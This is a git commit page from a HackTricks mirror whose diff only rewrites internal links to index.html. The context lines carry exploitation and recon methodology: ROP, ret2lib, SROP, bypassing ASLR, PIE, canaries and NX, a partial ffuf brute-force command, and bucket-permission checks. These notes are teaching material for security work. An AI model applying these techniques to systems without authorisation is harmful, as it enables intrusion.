maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

fix links

Browse Source
This commit is contained in:
Carlos Polop 2025-01-04 13:05:18 +01:00
parent 6eca4dfedd
commit 4038d4531f
65 changed files with 195 additions and 195 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
src/binary-exploitation/arbitrary-write-2-exec/aw2exec-got-plt.md
View File

@ -44,7 +44,7 @@ You can see the PLT addresses with **`objdump -j .plt -d ./vuln_binary`**
## libc GOT entries
The **GOT of libc** is usually compiled with **partial RELRO**, making it a nice target for this supposing it's possible to figure out its address ([**ASLR**](../common-binary-protections-and-bypasses/aslr/)).
The **GOT of libc** is usually compiled with **partial RELRO**, making it a nice target for this supposing it's possible to figure out its address ([**ASLR**](../common-binary-protections-and-bypasses/aslr/index.html)).
Common functions of the libc are going to call **other internal functions** whose GOT could be overwritten in order to get code execution.

48
src/binary-exploitation/basic-stack-binary-exploitation-methodology/README.md
View File

@ -24,10 +24,10 @@ With so many techniques it's good to have a scheme when each technique will be u
There are different was you could end controlling the flow of a program:
- [**Stack Overflows**](../stack-overflow/) overwriting the return pointer from the stack or the EBP -> ESP -> EIP.
- [**Stack Overflows**](../stack-overflow/index.html) overwriting the return pointer from the stack or the EBP -> ESP -> EIP.
- Might need to abuse an [**Integer Overflows**](../integer-overflow.md) to cause the overflow
- Or via **Arbitrary Writes + Write What Where to Execution**
- [**Format strings**](../format-strings/)**:** Abuse `printf` to write arbitrary content in arbitrary addresses.
- [**Format strings**](../format-strings/index.html)**:** Abuse `printf` to write arbitrary content in arbitrary addresses.
- [**Array Indexing**](../array-indexing.md): Abuse a poorly designed indexing to be able to control some arrays and get an arbitrary write.
- Might need to abuse an [**Integer Overflows**](../integer-overflow.md) to cause the overflow
- **bof to WWW via ROP**: Abuse a buffer overflow to construct a ROP and be able to get a WWW.
@ -52,16 +52,16 @@ Something to take into account is that usually **just one exploitation of a vuln
### Goal: Call an Existing function
- [**ret2win**](#ret2win): There is a function in the code you need to call (maybe with some specific params) in order to get the flag.
- In a **regular bof without** [**PIE**](../common-binary-protections-and-bypasses/pie/) **and** [**canary**](../common-binary-protections-and-bypasses/stack-canaries/) you just need to write the address in the return address stored in the stack.
- In a bof with [**PIE**](../common-binary-protections-and-bypasses/pie/), you will need to bypass it
- In a bof with [**canary**](../common-binary-protections-and-bypasses/stack-canaries/), you will need to bypass it
- In a **regular bof without** [**PIE**](../common-binary-protections-and-bypasses/pie/index.html) **and** [**canary**](../common-binary-protections-and-bypasses/stack-canaries/index.html) you just need to write the address in the return address stored in the stack.
- In a bof with [**PIE**](../common-binary-protections-and-bypasses/pie/index.html), you will need to bypass it
- In a bof with [**canary**](../common-binary-protections-and-bypasses/stack-canaries/index.html), you will need to bypass it
- If you need to set several parameter to correctly call the **ret2win** function you can use:
- A [**ROP**](#rop-and-ret2...-techniques) **chain if there are enough gadgets** to prepare all the params
- [**SROP**](../rop-return-oriented-programing/srop-sigreturn-oriented-programming/) (in case you can call this syscall) to control a lot of registers
- [**SROP**](../rop-return-oriented-programing/srop-sigreturn-oriented-programming/index.html) (in case you can call this syscall) to control a lot of registers
- Gadgets from [**ret2csu**](../rop-return-oriented-programing/ret2csu.md) and [**ret2vdso**](../rop-return-oriented-programing/ret2vdso.md) to control several registers
- Via a [**Write What Where**](../arbitrary-write-2-exec/) you could abuse other vulns (not bof) to call the **`win`** function.
- Via a [**Write What Where**](../arbitrary-write-2-exec/index.html) you could abuse other vulns (not bof) to call the **`win`** function.
- [**Pointers Redirecting**](../stack-overflow/pointer-redirecting.md): In case the stack contains pointers to a function that is going to be called or to a string that is going to be used by an interesting function (system or printf), it's possible to overwrite that address.
- [**ASLR**](../common-binary-protections-and-bypasses/aslr/) or [**PIE**](../common-binary-protections-and-bypasses/pie/) might affect the addresses.
- [**ASLR**](../common-binary-protections-and-bypasses/aslr/index.html) or [**PIE**](../common-binary-protections-and-bypasses/pie/index.html) might affect the addresses.
- [**Uninitialized vatiables**](../stack-overflow/uninitialized-variables.md): You never know.
### Goal: RCE
@ -69,30 +69,30 @@ Something to take into account is that usually **just one exploitation of a vuln
#### Via shellcode, if nx disabled or mixing shellcode with ROP:
- [**(Stack) Shellcode**](#stack-shellcode): This is useful to store a shellcode in the stack before of after overwriting the return pointer and then **jump to it** to execute it:
- **In any case, if there is a** [**canary**](../common-binary-protections-and-bypasses/stack-canaries/)**,** in a regular bof you will need to bypass (leak) it
- **Without** [**ASLR**](../common-binary-protections-and-bypasses/aslr/) **and** [**nx**](../common-binary-protections-and-bypasses/no-exec-nx.md) it's possible to jump to the address of the stack as it won't never change
- **With** [**ASLR**](../common-binary-protections-and-bypasses/aslr/) you will need techniques such as [**ret2esp/ret2reg**](../rop-return-oriented-programing/ret2esp-ret2reg.md) to jump to it
- **With** [**nx**](../common-binary-protections-and-bypasses/no-exec-nx.md), you will need to use some [**ROP**](../rop-return-oriented-programing/) **to call `memprotect`** and make some page `rwx`, in order to then **store the shellcode in there** (calling read for example) and then jump there.
- **In any case, if there is a** [**canary**](../common-binary-protections-and-bypasses/stack-canaries/index.html)**,** in a regular bof you will need to bypass (leak) it
- **Without** [**ASLR**](../common-binary-protections-and-bypasses/aslr/index.html) **and** [**nx**](../common-binary-protections-and-bypasses/no-exec-nx.md) it's possible to jump to the address of the stack as it won't never change
- **With** [**ASLR**](../common-binary-protections-and-bypasses/aslr/index.html) you will need techniques such as [**ret2esp/ret2reg**](../rop-return-oriented-programing/ret2esp-ret2reg.md) to jump to it
- **With** [**nx**](../common-binary-protections-and-bypasses/no-exec-nx.md), you will need to use some [**ROP**](../rop-return-oriented-programing/index.html) **to call `memprotect`** and make some page `rwx`, in order to then **store the shellcode in there** (calling read for example) and then jump there.
- This will mix shellcode with a ROP chain.
#### Via syscalls
- [**Ret2syscall**](../rop-return-oriented-programing/rop-syscall-execv/): Useful to call `execve` to run arbitrary commands. You need to be able to find the **gadgets to call the specific syscall with the parameters**.
- If [**ASLR**](../common-binary-protections-and-bypasses/aslr/) or [**PIE**](../common-binary-protections-and-bypasses/pie/) are enabled you'll need to defeat them **in order to use ROP gadgets** from the binary or libraries.
- [**SROP**](../rop-return-oriented-programing/srop-sigreturn-oriented-programming/) can be useful to prepare the **ret2execve**
- [**Ret2syscall**](../rop-return-oriented-programing/rop-syscall-execv/index.html): Useful to call `execve` to run arbitrary commands. You need to be able to find the **gadgets to call the specific syscall with the parameters**.
- If [**ASLR**](../common-binary-protections-and-bypasses/aslr/index.html) or [**PIE**](../common-binary-protections-and-bypasses/pie/index.html) are enabled you'll need to defeat them **in order to use ROP gadgets** from the binary or libraries.
- [**SROP**](../rop-return-oriented-programing/srop-sigreturn-oriented-programming/index.html) can be useful to prepare the **ret2execve**
- Gadgets from [**ret2csu**](../rop-return-oriented-programing/ret2csu.md) and [**ret2vdso**](../rop-return-oriented-programing/ret2vdso.md) to control several registers
#### Via libc
- [**Ret2lib**](../rop-return-oriented-programing/ret2lib/): Useful to call a function from a library (usually from **`libc`**) like **`system`** with some prepared arguments (e.g. `'/bin/sh'`). You need the binary to **load the library** with the function you would like to call (libc usually).
- If **statically compiled and no** [**PIE**](../common-binary-protections-and-bypasses/pie/), the **address** of `system` and `/bin/sh` are not going to change, so it's possible to use them statically.
- **Without** [**ASLR**](../common-binary-protections-and-bypasses/aslr/) **and knowing the libc version** loaded, the **address** of `system` and `/bin/sh` are not going to change, so it's possible to use them statically.
- With [**ASLR**](../common-binary-protections-and-bypasses/aslr/) **but no** [**PIE**](../common-binary-protections-and-bypasses/pie/)**, knowing the libc and with the binary using the `system`** function it's possible to **`ret` to the address of system in the GOT** with the address of `'/bin/sh'` in the param (you will need to figure this out).
- With [ASLR](../common-binary-protections-and-bypasses/aslr/) but no [PIE](../common-binary-protections-and-bypasses/pie/), knowing the libc and **without the binary using the `system`** :
- [**Ret2lib**](../rop-return-oriented-programing/ret2lib/index.html): Useful to call a function from a library (usually from **`libc`**) like **`system`** with some prepared arguments (e.g. `'/bin/sh'`). You need the binary to **load the library** with the function you would like to call (libc usually).
- If **statically compiled and no** [**PIE**](../common-binary-protections-and-bypasses/pie/index.html), the **address** of `system` and `/bin/sh` are not going to change, so it's possible to use them statically.
- **Without** [**ASLR**](../common-binary-protections-and-bypasses/aslr/index.html) **and knowing the libc version** loaded, the **address** of `system` and `/bin/sh` are not going to change, so it's possible to use them statically.
- With [**ASLR**](../common-binary-protections-and-bypasses/aslr/index.html) **but no** [**PIE**](../common-binary-protections-and-bypasses/pie/index.html)**, knowing the libc and with the binary using the `system`** function it's possible to **`ret` to the address of system in the GOT** with the address of `'/bin/sh'` in the param (you will need to figure this out).
- With [ASLR](../common-binary-protections-and-bypasses/aslr/index.html) but no [PIE](../common-binary-protections-and-bypasses/pie/index.html), knowing the libc and **without the binary using the `system`** :
- Use [**`ret2dlresolve`**](../rop-return-oriented-programing/ret2dlresolve.md) to resolve the address of `system` and call it 
- **Bypass** [**ASLR**](../common-binary-protections-and-bypasses/aslr/) and calculate the address of `system` and `'/bin/sh'` in memory.
- **With** [**ASLR**](../common-binary-protections-and-bypasses/aslr/) **and** [**PIE**](../common-binary-protections-and-bypasses/pie/) **and not knowing the libc**: You need to:
- Bypass [**PIE**](../common-binary-protections-and-bypasses/pie/)
- **Bypass** [**ASLR**](../common-binary-protections-and-bypasses/aslr/index.html) and calculate the address of `system` and `'/bin/sh'` in memory.
- **With** [**ASLR**](../common-binary-protections-and-bypasses/aslr/index.html) **and** [**PIE**](../common-binary-protections-and-bypasses/pie/index.html) **and not knowing the libc**: You need to:
- Bypass [**PIE**](../common-binary-protections-and-bypasses/pie/index.html)
- Find the **`libc` version** used (leak a couple of function addresses)
- Check the **previous scenarios with ASLR** to continue.
@ -105,7 +105,7 @@ Something to take into account is that usually **just one exploitation of a vuln
#### Misc
- [**Pointers Redirecting**](../stack-overflow/pointer-redirecting.md): In case the stack contains pointers to a function that is going to be called or to a string that is going to be used by an interesting function (system or printf), it's possible to overwrite that address.
- [**ASLR**](../common-binary-protections-and-bypasses/aslr/) or [**PIE**](../common-binary-protections-and-bypasses/pie/) might affect the addresses.
- [**ASLR**](../common-binary-protections-and-bypasses/aslr/index.html) or [**PIE**](../common-binary-protections-and-bypasses/pie/index.html) might affect the addresses.
- [**Uninitialized variables**](../stack-overflow/uninitialized-variables.md): You never know
{{#include ../../banners/hacktricks-training.md}}

6
src/binary-exploitation/common-binary-protections-and-bypasses/no-exec-nx.md
View File

@ -8,9 +8,9 @@ The **No-Execute (NX)** bit, also known as **Execute Disable (XD)** in Intel ter
## Bypasses
- It's possible to use techniques such as [**ROP**](../rop-return-oriented-programing/) **to bypass** this protection by executing chunks of executable code already present in the binary.
- [**Ret2libc**](../rop-return-oriented-programing/ret2lib/)
- [**Ret2syscall**](../rop-return-oriented-programing/rop-syscall-execv/)
- It's possible to use techniques such as [**ROP**](../rop-return-oriented-programing/index.html) **to bypass** this protection by executing chunks of executable code already present in the binary.
- [**Ret2libc**](../rop-return-oriented-programing/ret2lib/index.html)
- [**Ret2syscall**](../rop-return-oriented-programing/rop-syscall-execv/index.html)
- **Ret2...**
{{#include ../../banners/hacktricks-training.md}}

2
src/binary-exploitation/common-binary-protections-and-bypasses/pie/README.md
View File

@ -23,7 +23,7 @@ In order to bypass PIE it's needed to **leak some address of the loaded** binary
bypassing-canary-and-pie.md
{{#endref}}
- Use an **arbitrary read** vulnerability such as [**format string**](../../format-strings/) to leak an address of the binary (e.g. from the stack, like in the previous technique) to get the base of the binary and use offsets from there. [**Find an example here**](https://ir0nstone.gitbook.io/notes/types/stack/pie/pie-bypass).
- Use an **arbitrary read** vulnerability such as [**format string**](../../format-strings/index.html) to leak an address of the binary (e.g. from the stack, like in the previous technique) to get the base of the binary and use offsets from there. [**Find an example here**](https://ir0nstone.gitbook.io/notes/types/stack/pie/pie-bypass).
## References

2
src/binary-exploitation/libc-heap/heap-overflow.md
View File

@ -4,7 +4,7 @@
## Basic Information
A heap overflow is like a [**stack overflow**](../stack-overflow/) but in the heap. Basically it means that some space was reserved in the heap to store some data and **stored data was bigger than the space reserved.**
A heap overflow is like a [**stack overflow**](../stack-overflow/index.html) but in the heap. Basically it means that some space was reserved in the heap to store some data and **stored data was bigger than the space reserved.**
In stack overflows we know that some registers like the instruction pointer or the stack frame are going to be restored from the stack and it could be possible to abuse this. In case of heap overflows, there **isn't any sensitive information stored by default** in the heap chunk that can be overflowed. However, it could be sensitive information or pointers, so the **criticality** of this vulnerability **depends** on **which data could be overwritten** and how an attacker could abuse this.

6
src/binary-exploitation/rop-return-oriented-programing/README.md
View File

@ -37,7 +37,7 @@ First, let's assume we've identified the necessary gadgets within the binary or
Using **pwntools**, we prepare the stack for the ROP chain execution as follows aiming to execute `system('/bin/sh')`, note how the chain starts with:
1. A `ret` instruction for alignment purposes (optional)
2. Address of `system` function (supposing ASLR disabled and known libc, more info in [**Ret2lib**](ret2lib/))
2. Address of `system` function (supposing ASLR disabled and known libc, more info in [**Ret2lib**](ret2lib/index.html))
3. Placeholder for the return address from `system()`
4. `"/bin/sh"` string address (parameter for system function)
@ -158,8 +158,8 @@ Check the following page for this information:
## Protections Against ROP
- [**ASLR**](../common-binary-protections-and-bypasses/aslr/) **&** [**PIE**](../common-binary-protections-and-bypasses/pie/): These protections makes harder the use of ROP as the addresses of the gadgets changes between execution.
- [**Stack Canaries**](../common-binary-protections-and-bypasses/stack-canaries/): In of a BOF, it's needed to bypass the stores stack canary to overwrite return pointers to abuse a ROP chain
- [**ASLR**](../common-binary-protections-and-bypasses/aslr/index.html) **&** [**PIE**](../common-binary-protections-and-bypasses/pie/index.html): These protections makes harder the use of ROP as the addresses of the gadgets changes between execution.
- [**Stack Canaries**](../common-binary-protections-and-bypasses/stack-canaries/index.html): In of a BOF, it's needed to bypass the stores stack canary to overwrite return pointers to abuse a ROP chain
- **Lack of Gadgets**: If there aren't enough gadgets it won't be possible to generate a ROP chain.
## ROP based techniques

2
src/binary-exploitation/rop-return-oriented-programing/ret2csu.md
View File

@ -179,7 +179,7 @@ target.interactive()
### Why Not Just Use libc Directly?
Usually these cases are also vulnerable to [**ret2plt**](../common-binary-protections-and-bypasses/aslr/ret2plt.md) + [**ret2lib**](ret2lib/), but sometimes you need to control more parameters than are easily controlled with the gadgets you find directly in libc. For example, the `write()` function requires three parameters, and **finding gadgets to set all these directly might not be possible**.
Usually these cases are also vulnerable to [**ret2plt**](../common-binary-protections-and-bypasses/aslr/ret2plt.md) + [**ret2lib**](ret2lib/index.html), but sometimes you need to control more parameters than are easily controlled with the gadgets you find directly in libc. For example, the `write()` function requires three parameters, and **finding gadgets to set all these directly might not be possible**.
{{#include ../../banners/hacktricks-training.md}}

2
src/binary-exploitation/rop-return-oriented-programing/ret2dlresolve.md
View File

@ -13,7 +13,7 @@ Therefore, it's possible to **fake all these structures** to make the dynamic li
Usually, all these structures are faked by making an **initial ROP chain that calls `read`** over a writable memory, then the **structures** and the string **`'/bin/sh'`** are passed so they are stored by read in a known location, and then the ROP chain continues by calling **`_dl_runtime_resolve`** , having it **resolve the address of `system`** in the fake structures and **calling this address** with the address to `$'/bin/sh'`.
> [!TIP]
> This technique is useful specially if there aren't syscall gadgets (to use techniques such as [**ret2syscall**](rop-syscall-execv/) or [SROP](srop-sigreturn-oriented-programming/)) and there are't ways to leak libc addresses.
> This technique is useful specially if there aren't syscall gadgets (to use techniques such as [**ret2syscall**](rop-syscall-execv/index.html) or [SROP](srop-sigreturn-oriented-programming/index.html)) and there are't ways to leak libc addresses.
Chek this video for a nice explanation about this technique in the second half of the video:

4
src/binary-exploitation/rop-return-oriented-programing/ret2esp-ret2reg.md
View File

@ -6,7 +6,7 @@
**Because the ESP (Stack Pointer) always points to the top of the stack**, this technique involves replacing the EIP (Instruction Pointer) with the address of a **`jmp esp`** or **`call esp`** instruction. By doing this, the shellcode is placed right after the overwritten EIP. When the `ret` instruction executes, ESP points to the next address, precisely where the shellcode is stored.
If **Address Space Layout Randomization (ASLR)** is not enabled in Windows or Linux, it's possible to use `jmp esp` or `call esp` instructions found in shared libraries. However, with [**ASLR**](../common-binary-protections-and-bypasses/aslr/) active, one might need to look within the vulnerable program itself for these instructions (and you might need to defeat [**PIE**](../common-binary-protections-and-bypasses/pie/)).
If **Address Space Layout Randomization (ASLR)** is not enabled in Windows or Linux, it's possible to use `jmp esp` or `call esp` instructions found in shared libraries. However, with [**ASLR**](../common-binary-protections-and-bypasses/aslr/index.html) active, one might need to look within the vulnerable program itself for these instructions (and you might need to defeat [**PIE**](../common-binary-protections-and-bypasses/pie/index.html)).
Moreover, being able to place the shellcode **after the EIP corruption**, rather than in the middle of the stack, ensures that any `push` or `pop` instructions executed during the function's operation don't interfere with the shellcode. This interference could happen if the shellcode were placed in the middle of the function's stack.
@ -179,7 +179,7 @@ p.interactive()
## Protections
- [**NX**](../common-binary-protections-and-bypasses/no-exec-nx.md): If the stack isn't executable this won't help as we need to place the shellcode in the stack and jump to execute it.
- [**ASLR**](../common-binary-protections-and-bypasses/aslr/) & [**PIE**](../common-binary-protections-and-bypasses/pie/): Those can make harder to find a instruction to jump to esp or any other register.
- [**ASLR**](../common-binary-protections-and-bypasses/aslr/index.html) & [**PIE**](../common-binary-protections-and-bypasses/pie/index.html): Those can make harder to find a instruction to jump to esp or any other register.
## References

2
src/binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/README.md
View File

@ -16,7 +16,7 @@ In order to prepare the call for the **syscall** it's needed the following confi
So, basically it's needed to write the string `/bin/sh` somewhere and then perform the `syscall` (being aware of the padding needed to control the stack). For this, we need a gadget to write `/bin/sh` in a known area.
> [!TIP]
> Another interesting syscall to call is **`mprotect`** which would allow an attacker to **modify the permissions of a page in memory**. This can be combined with [**ret2shellcode**](../../stack-overflow/stack-shellcode/).
> Another interesting syscall to call is **`mprotect`** which would allow an attacker to **modify the permissions of a page in memory**. This can be combined with [**ret2shellcode**](../../stack-overflow/stack-shellcode/index.html).
## Register gadgets

6
src/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/README.md
View File

@ -134,11 +134,11 @@ target.interactive()
- [https://youtu.be/ADULSwnQs-s?feature=shared](https://youtu.be/ADULSwnQs-s?feature=shared)
- [https://ir0nstone.gitbook.io/notes/types/stack/syscalls/sigreturn-oriented-programming-srop](https://ir0nstone.gitbook.io/notes/types/stack/syscalls/sigreturn-oriented-programming-srop)
- [https://guyinatuxedo.github.io/16-srop/backdoor_funsignals/index.html](https://guyinatuxedo.github.io/16-srop/backdoor_funsignals/index.html)
- Assembly binary that allows to **write to the stack** and then calls the **`sigreturn`** syscall. It's possible to write on the stack a [**ret2syscall**](../rop-syscall-execv/) via a **sigreturn** structure and read the flag which is inside the memory of the binary.
- Assembly binary that allows to **write to the stack** and then calls the **`sigreturn`** syscall. It's possible to write on the stack a [**ret2syscall**](../rop-syscall-execv/index.html) via a **sigreturn** structure and read the flag which is inside the memory of the binary.
- [https://guyinatuxedo.github.io/16-srop/csaw19_smallboi/index.html](https://guyinatuxedo.github.io/16-srop/csaw19_smallboi/index.html)
- Assembly binary that allows to **write to the stack** and then calls the **`sigreturn`** syscall. It's possible to write on the stack a [**ret2syscall**](../rop-syscall-execv/) via a **sigreturn** structure (the binary has the string `/bin/sh`).
- Assembly binary that allows to **write to the stack** and then calls the **`sigreturn`** syscall. It's possible to write on the stack a [**ret2syscall**](../rop-syscall-execv/index.html) via a **sigreturn** structure (the binary has the string `/bin/sh`).
- [https://guyinatuxedo.github.io/16-srop/inctf17_stupidrop/index.html](https://guyinatuxedo.github.io/16-srop/inctf17_stupidrop/index.html)
- 64 bits, no relro, no canary, nx, no pie. Simple buffer overflow abusing `gets` function with lack of gadgets that performs a [**ret2syscall**](../rop-syscall-execv/). The ROP chain writes `/bin/sh` in the `.bss` by calling gets again, it abuses the **`alarm`** function to set eax to `0xf` to call a **SROP** and execute a shell.
- 64 bits, no relro, no canary, nx, no pie. Simple buffer overflow abusing `gets` function with lack of gadgets that performs a [**ret2syscall**](../rop-syscall-execv/index.html). The ROP chain writes `/bin/sh` in the `.bss` by calling gets again, it abuses the **`alarm`** function to set eax to `0xf` to call a **SROP** and execute a shell.
- [https://guyinatuxedo.github.io/16-srop/swamp19_syscaller/index.html](https://guyinatuxedo.github.io/16-srop/swamp19_syscaller/index.html)
- 64 bits assembly program, no relro, no canary, nx, no pie. The flow allows to write in the stack, control several registers, and call a syscall and then it calls `exit`. The selected syscall is a `sigreturn` that will set registries and move `eip` to call a previous syscall instruction and run `memprotect` to set the binary space to `rwx` and set the ESP in the binary space. Following the flow, the program will call read intro ESP again, but in this case ESP will be pointing to the next intruction so passing a shellcode will write it as the next instruction and execute it.
- [https://www.ctfrecipes.com/pwn/stack-exploitation/arbitrary-code-execution/code-reuse-attack/sigreturn-oriented-programming-srop#disable-stack-protection](https://www.ctfrecipes.com/pwn/stack-exploitation/arbitrary-code-execution/code-reuse-attack/sigreturn-oriented-programming-srop#disable-stack-protection)

2
src/binary-exploitation/stack-overflow/README.md
View File

@ -63,7 +63,7 @@ However, in other scenarios maybe just **overwriting some variables values in th
### Ret2win
In this type of CTF challenges, there is a **function** **inside** the binary that is **never called** and that **you need to call in order to win**. For these challenges you just need to find the **offset to overwrite the return address** and **find the address of the function** to call (usually [**ASLR**](../common-binary-protections-and-bypasses/aslr/) would be disabled) so when the vulnerable function returns, the hidden function will be called:
In this type of CTF challenges, there is a **function** **inside** the binary that is **never called** and that **you need to call in order to win**. For these challenges you just need to find the **offset to overwrite the return address** and **find the address of the function** to call (usually [**ASLR**](../common-binary-protections-and-bypasses/aslr/index.html) would be disabled) so when the vulnerable function returns, the hidden function will be called:
{{#ref}}
ret2win/

4
src/binary-exploitation/stack-overflow/ret2win/README.md
View File

@ -77,8 +77,8 @@ The Python script sends a carefully crafted message that, when processed by the
## Protections
- [**PIE**](../../common-binary-protections-and-bypasses/pie/) **should be disabled** for the address to be reliable across executions or the address where the function will be stored won't be always the same and you would need some leak in order to figure out where is the win function loaded. In some cases, when the function that causes the overflow is `read` or similar, you can do a **Partial Overwrite** of 1 or 2 bytes to change the return address to be the win function. Because of how ASLR works, the last three hex nibbles are not randomized, so there is a **1/16 chance** (1 nibble) to get the correct return address.
- [**Stack Canaries**](../../common-binary-protections-and-bypasses/stack-canaries/) should be also disabled or the compromised EIP return address won't never be followed.
- [**PIE**](../../common-binary-protections-and-bypasses/pie/index.html) **should be disabled** for the address to be reliable across executions or the address where the function will be stored won't be always the same and you would need some leak in order to figure out where is the win function loaded. In some cases, when the function that causes the overflow is `read` or similar, you can do a **Partial Overwrite** of 1 or 2 bytes to change the return address to be the win function. Because of how ASLR works, the last three hex nibbles are not randomized, so there is a **1/16 chance** (1 nibble) to get the correct return address.
- [**Stack Canaries**](../../common-binary-protections-and-bypasses/stack-canaries/index.html) should be also disabled or the compromised EIP return address won't never be followed.
## Other examples & References

4
src/binary-exploitation/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md
View File

@ -32,7 +32,7 @@ Then, you need to know the address used by `ret` that will **execute arbitrary c
- A valid [**ONE_GADGET**](https://github.com/david942j/one_gadget) address.
- The address of **`system()`** followed by **4 junk bytes** and the address of `"/bin/sh"` (x86 bits).
- The address of a **`jump esp;`** gadget ([**ret2esp**](../rop-return-oriented-programing/ret2esp-ret2reg.md)) followed by the **shellcode** to execute.
- Some [**ROP**](../rop-return-oriented-programing/) chain
- Some [**ROP**](../rop-return-oriented-programing/index.html) chain
Remember than before any of these addresses in the controlled part of the memory, there must be **`4` bytes** because of the **`pop`** part of the `leave` instruction. It would be possible to abuse these 4B to set a **second fake EBP** and continue controlling the execution.
@ -56,7 +56,7 @@ Now, the **`ESP`** is controlled pointing to a desired address and the next inst
Basically this way it's possible to chain several fake EBPs to control the flow of the program.
This is like a [ret2lib](../rop-return-oriented-programing/ret2lib/), but more complex with no apparent benefit but could be interesting in some edge-cases.
This is like a [ret2lib](../rop-return-oriented-programing/ret2lib/index.html), but more complex with no apparent benefit but could be interesting in some edge-cases.
Moreover, here you have an [**example of a challenge**](https://ir0nstone.gitbook.io/notes/types/stack/stack-pivoting/exploitation/leave) that uses this technique with a **stack leak** to call a winning function. This is the final payload from the page:

4
src/binary-exploitation/stack-overflow/stack-shellcode/README.md
View File

@ -78,8 +78,8 @@ The **NOP slide** (`asm('nop')`) is used to increase the chance that execution w
## Protections
- [**ASLR**](../../common-binary-protections-and-bypasses/aslr/) **should be disabled** for the address to be reliable across executions or the address where the function will be stored won't be always the same and you would need some leak in order to figure out where is the win function loaded.
- [**Stack Canaries**](../../common-binary-protections-and-bypasses/stack-canaries/) should be also disabled or the compromised EIP return address won't never be followed.
- [**ASLR**](../../common-binary-protections-and-bypasses/aslr/index.html) **should be disabled** for the address to be reliable across executions or the address where the function will be stored won't be always the same and you would need some leak in order to figure out where is the win function loaded.
- [**Stack Canaries**](../../common-binary-protections-and-bypasses/stack-canaries/index.html) should be also disabled or the compromised EIP return address won't never be followed.
- [**NX**](../../common-binary-protections-and-bypasses/no-exec-nx.md) **stack** protection would prevent the execution of the shellcode inside the stack because that region won't be executable.
## Other Examples & References

2
src/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md
View File

@ -52,7 +52,7 @@ This tool can scan an image and will **extract pcaps** inside it, **network info
bulk_extractor memory.img -o out_folder
```
Navigate through **all the information** that the tool has gathered (passwords?), **analyse** the **packets** (read[ **Pcaps analysis**](../pcap-inspection/)), search for **weird domains** (domains related to **malware** or **non-existent**).
Navigate through **all the information** that the tool has gathered (passwords?), **analyse** the **packets** (read[ **Pcaps analysis**](../pcap-inspection/index.html)), search for **weird domains** (domains related to **malware** or **non-existent**).
### PhotoRec

2
src/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-tools.md
View File

@ -48,7 +48,7 @@ This tool can scan an image and will **extract pcaps** inside it, **network info
bulk_extractor memory.img -o out_folder
```
Navigate through **all the information** that the tool has gathered \(passwords?\), **analyse** the **packets** \(read[ **Pcaps analysis**](../pcap-inspection/)\), search for **weird domains** \(domains related to **malware** or **non-existent**\).
Navigate through **all the information** that the tool has gathered \(passwords?\), **analyse** the **packets** \(read[ **Pcaps analysis**](../pcap-inspection/index.html)\), search for **weird domains** \(domains related to **malware** or **non-existent**\).
## PhotoRec

2
src/generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md
View File

@ -52,7 +52,7 @@ This tool can scan an image and will **extract pcaps** inside it, **network info
bulk_extractor memory.img -o out_folder
```
Navigate through **all the information** that the tool has gathered (passwords?), **analyse** the **packets** (read[ **Pcaps analysis**](../pcap-inspection/)), search for **weird domains** (domains related to **malware** or **non-existent**).
Navigate through **all the information** that the tool has gathered (passwords?), **analyse** the **packets** (read[ **Pcaps analysis**](../pcap-inspection/index.html)), search for **weird domains** (domains related to **malware** or **non-existent**).
### PhotoRec

12
src/generic-methodologies-and-resources/external-recon-methodology/README.md
View File

@ -526,8 +526,8 @@ ffuf -w subdomains-top1million-5000.txt -u http://10.10.10.208 -H 'Origin: http:
### **Buckets Brute Force**
While looking for **subdomains** keep an eye to see if it is **pointing** to any type of **bucket**, and in that case [**check the permissions**](../../network-services-pentesting/pentesting-web/buckets/)**.**\
Also, as at this point you will know all the domains inside the scope, try to [**brute force possible bucket names and check the permissions**](../../network-services-pentesting/pentesting-web/buckets/).
While looking for **subdomains** keep an eye to see if it is **pointing** to any type of **bucket**, and in that case [**check the permissions**](../../network-services-pentesting/pentesting-web/buckets/index.html)**.**\
Also, as at this point you will know all the domains inside the scope, try to [**brute force possible bucket names and check the permissions**](../../network-services-pentesting/pentesting-web/buckets/index.html).
### **Monitorization**
@ -536,7 +536,7 @@ You can **monitor** if **new subdomains** of a domain are created by monitoring
### **Looking for vulnerabilities**
Check for possible [**subdomain takeovers**](../../pentesting-web/domain-subdomain-takeover.md#subdomain-takeover).\
If the **subdomain** is pointing to some **S3 bucket**, [**check the permissions**](../../network-services-pentesting/pentesting-web/buckets/).
If the **subdomain** is pointing to some **S3 bucket**, [**check the permissions**](../../network-services-pentesting/pentesting-web/buckets/index.html).
If you find any **subdomain with an IP different** from the ones you already found in the assets discovery, you should perform a **basic vulnerability scan** (using Nessus or OpenVAS) and some [**port scan**](../pentesting-network/index.html#discovering-hosts-from-the-outside) with **nmap/masscan/shodan**. Depending on which services are running you can find in **this book some tricks to "attack" them**.\
&#xNAN;_Note that sometimes the subdomain is hosted inside an IP that is not controlled by the client, so it's not in the scope, be careful._
@ -556,7 +556,7 @@ You can also check for domains pointing a specific IP address using the tool [**
**Port scan all the IPs that doesnt belong to CDNs** (as you highly probably wont find anything interested in there). In the running services discovered you might be **able to find vulnerabilities**.
**Find a** [**guide**](../pentesting-network/) **about how to scan hosts.**
**Find a** [**guide**](../pentesting-network/index.html) **about how to scan hosts.**
## Web servers hunting
@ -674,9 +674,9 @@ There are also free services that allow you to **scan public repositories**, suc
- [**Snyk**](https://app.snyk.io/)
## [**Pentesting Web Methodology**](../../network-services-pentesting/pentesting-web/)
## [**Pentesting Web Methodology**](../../network-services-pentesting/pentesting-web/index.html)
The **majority of the vulnerabilities** found by bug hunters resides inside **web applications**, so at this point I would like to talk about a **web application testing methodology**, and you can [**find this information here**](../../network-services-pentesting/pentesting-web/).
The **majority of the vulnerabilities** found by bug hunters resides inside **web applications**, so at this point I would like to talk about a **web application testing methodology**, and you can [**find this information here**](../../network-services-pentesting/pentesting-web/index.html).
